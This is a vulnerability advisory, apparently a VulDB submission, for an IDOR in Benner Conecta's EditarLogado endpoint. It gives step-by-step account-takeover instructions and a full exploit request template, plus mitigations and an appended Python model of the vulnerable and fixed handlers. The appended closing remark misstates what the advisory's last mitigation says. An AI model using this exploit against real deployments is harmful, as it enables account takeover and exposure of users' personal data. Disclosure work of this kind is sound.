Submit #501406: benner Benner Conecta 1.0.5330 Insecure Direct Object Reference leads to Account Take Over

Title: benner Benner Conecta 1.0.5330 Insecure Direct Object Reference leads to Account Take Over
Description: IDOR leading to Account Takeover in Benner Conecta

Vendor: Benner
Affected Version: 1.0.5330.0

Description
A critical Insecure Direct Object Reference (IDOR) vulnerability has been identified in the Benner Conecta system, version 1.0.5330.0. The flaw allows an authenticated attacker to modify the account details of any other user, which leads to full account takeover. The vulnerable endpoint is:

POST /Usuarios/Usuario/EditarLogado/YOUR-ID-HERE

When a user opens "Minha Conta" → "Editar" and saves changes, the request can be intercepted and the Handle parameter changed so that the update is applied to another user's account; the server never checks that the Handle belongs to the logged-in user. The endpoint also requires a __RequestVerificationToken. That token is an anti-forgery (CSRF) token bound to the attacker's own session, and a fresh one can be obtained at any time by reloading the account settings page, so it does not limit the number of unauthorized modifications an attacker can perform.

Proof of Concept (PoC)
1. Navigate to "Minha Conta" → "Editar" and capture the save request with an intercepting proxy (e.g. Burp Suite).
2. Change the Handle parameter to the victim's user ID.
3. Change the Email field to an attacker-controlled address.
4. Send the modified request, keeping all headers, cookies and the __RequestVerificationToken of the attacker's own session valid.
5. Start the "Forgot Password" flow for the newly set email address.
6. Reset the victim's password and take full control of the account.
Example Exploit Request:

POST /Usuarios/Usuario/EditarLogado/YOUR-ID-HERE HTTP/2

------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="__RequestVerificationToken"

YOUR-USEFUL-TOKEN-HERE
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="Handle"

VICTIM-ID-HERE
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="HandleOperadora"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="TemCpf"

True
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="PodeEditarPapeis"

False
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="Cnpj"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="ExcluirAvatar"

false
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="Nome"

NAME-HERE
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="Cpf"

A-REAL-CPF-HERE
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="Sexo"

Feminino
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="RazaoSocial"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="Email"

EMAIL-CONTROLLED-BY-THE-ATTACKER-HERE
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="EmailSecundario"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="Senha"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="ConfirmacaoSenha"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="TipoUsuario"

Secretaria
------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="AcessoPermitidos"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="CropImage.Width"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="CropImage.Height"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="CropImage.X"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="CropImage.Y"


------WebKitFormBoundaryYRr42bBaGfIdohAs
Content-Disposition: form-data; name="CropImage.Image"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryYRr42bBaGfIdohAs--

Impact
- Unauthorized modification of any user's account data.
- Full account takeover: change the victim's email, then reset the password through the "Forgot Password" flow.
- Exposure of Personally Identifiable Information (PII) such as name and CPF.

Mitigation
- Enforce an authorization check on EditarLogado so that a user can only modify their own record: resolve the target from the authenticated session, not from the client-supplied Handle, and reject any request whose Handle does not match the logged-in user.
- Validate server-side that fields the user is not allowed to set (e.g. PodeEditarPapeis, TipoUsuario) cannot be changed through this endpoint, using role-based access control (RBAC) to prevent privilege escalation.
- Keep the __RequestVerificationToken anti-forgery check, but do not rely on it for authorization: it only proves the request came from the attacker's own session and does not bind the request to the account named in Handle.

By: Yago Martins
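The following is an added example, not code from the advisory or from Benner. It models the EditarLogado handler in a few lines of Python: a small multipart/form-data parser for the request shape shown above, a vulnerable handler that picks the record to update from the posted Handle, and a hardened handler that resolves the record from the session and refuses a mismatched Handle. The field names and boundary come from the advisory; the in-memory user store, the numeric handles, the session argument and the function names are assumptions for illustration.

```python
"""Added example (not part of the advisory or of Benner Conecta).

Models the IDOR in POST /Usuarios/Usuario/EditarLogado: the vulnerable
handler trusts the client-supplied Handle field, the fixed handler uses the
authenticated session's user instead. The user store, handles and function
names are assumptions for illustration.
"""
from dataclasses import dataclass

# Boundary taken from the advisory's request; "--" + BOUNDARY delimits parts.
BOUNDARY = "----WebKitFormBoundaryYRr42bBaGfIdohAs"


@dataclass
class User:
    handle: int
    nome: str
    email: str


def fresh_store() -> dict[int, User]:
    """Constructed in-memory user table: an attacker (7) and a victim (42)."""
    return {
        7: User(7, "attacker", "attacker@example.com"),
        42: User(42, "victim", "victim@example.com"),
    }


def parse_multipart(body: str, boundary: str) -> dict[str, str]:
    """Minimal multipart/form-data parser: {field name: value}.

    Handles the plain text parts the advisory's request uses; a file part
    with filename="" is recorded with an empty value.
    """
    fields: dict[str, str] = {}
    for part in body.split("--" + boundary):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble / closing "--"
            continue
        head, _, value = part.partition("\r\n\r\n")
        name = None
        for line in head.split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                for param in line.split(";")[1:]:
                    key, _, val = param.strip().partition("=")
                    if key == "name":
                        name = val.strip('"')
        if name is not None:
            fields[name] = value.strip("\r\n")
    return fields


def build_request(handle: str, email: str, token: str = "TOKEN") -> str:
    """Constructed body mirroring the advisory's request (subset of fields)."""
    text_parts = [
        ("__RequestVerificationToken", token),
        ("Handle", handle),
        ("Nome", "NAME-HERE"),
        ("Email", email),
        ("TipoUsuario", "Secretaria"),
    ]
    out = ""
    for name, value in text_parts:
        out += (f"--{BOUNDARY}\r\nContent-Disposition: form-data; "
                f'name="{name}"\r\n\r\n{value}\r\n')
    out += (f"--{BOUNDARY}\r\nContent-Disposition: form-data; "
            'name="CropImage.Image"; filename=""\r\n'
            "Content-Type: application/octet-stream\r\n\r\n\r\n")
    return out + f"--{BOUNDARY}--\r\n"


def editar_logado_vulnerable(session_user: int, body: str,
                             store: dict[int, User]) -> str:
    """Vulnerable: the record to update is chosen by the posted Handle.

    session_user is the authenticated user (from the cookie) but is never
    compared with Handle, so any user can overwrite any other user's email.
    """
    form = parse_multipart(body, BOUNDARY)
    target = store[int(form["Handle"])]     # IDOR: no ownership check
    target.email = form["Email"]
    return "200 OK"


def editar_logado_fixed(session_user: int, body: str,
                        store: dict[int, User]) -> str:
    """Hardened: the record is always the session's own user.

    A Handle naming anyone else is rejected; the anti-forgery token (checked
    elsewhere) is a CSRF defence and plays no part in this decision.
    """
    form = parse_multipart(body, BOUNDARY)
    if form.get("Handle") and int(form["Handle"]) != session_user:
        return "403 Forbidden"
    target = store[session_user]
    target.email = form["Email"]
    return "200 OK"


if __name__ == "__main__":
    attack = build_request("42", "attacker@evil.example")
    s = fresh_store()
    print(editar_logado_vulnerable(7, attack, s), s[42].email)  # victim changed
    s = fresh_store()
    print(editar_logado_fixed(7, attack, s), s[42].email)       # 403, unchanged
```

The hardened handler does not try to "bind" the anti-forgery token to the victim's account, as the advisory's last mitigation suggests; the token's job is to prove the request originated from the attacker's own session, which it already does in the exploit. The only check that closes the IDOR is comparing the requested Handle with the identity the server already knows from the session.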
Source: https://github.com/yago3008/cves
User: y4g0 (UID 80480)
Submission: 02/14/2025 06:55 PM
Moderation: 02/24/2025 06:22 PM (10 days later)
Status: Accepted
VulDB Entry: 296695 [Benner Connecta 1.0.5330 EditarLogado Handle resource injection]
Points: 20
